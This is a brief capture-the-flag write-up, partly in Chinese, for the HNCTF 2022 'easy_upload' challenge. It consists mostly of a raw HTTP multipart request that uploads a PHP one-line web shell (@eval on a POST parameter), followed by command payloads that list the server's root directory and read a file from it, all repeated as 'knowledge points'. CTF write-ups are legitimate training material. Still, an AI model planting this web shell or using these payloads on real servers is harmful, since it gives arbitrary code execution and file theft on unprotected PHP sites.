[HNCTF 2022 Week1]easy_upload
play
POST /index.php HTTP/1.1
Host: node2.anna.nssctf.cn:28760
Content-Length: 329
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://node2.anna.nssctf.cn:28760
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydmXAZf9bLhu93Arm
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://node2.anna.nssctf.cn:28760/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4a93f4c4530217fbb05fe9e1b2da945b
Connection: close
------WebKitFormBoundarydmXAZf9bLhu93Arm
Content-Disposition: form-data; name="file"; filename="sqzr.php"
Content-Type: application/octet-stream
<?php
@eval($_POST['cmd']);
?>
------WebKitFormBoundarydmXAZf9bLhu93Arm
Content-Disposition: form-data; name="submit"
æ交
------WebKitFormBoundarydmXAZf9bLhu93Arm--
webshell工具连接,flag在/下 文件名ffflllaaaggg
或者GET请求
cmd=var_dump(scandir(“/”)); #获取/目录
cmd=var_dump(file_get_contents(“/ffflllaaaggg”)); 读取flag文件
知识点
- cmd=var_dump(scandir(“/”)); #获取目录
- cmd=var_dump(file_get_contents(“/ffflllaaaggg”)); 读取文件
- 一句话
<?php @eval($_POST['cmd']);?>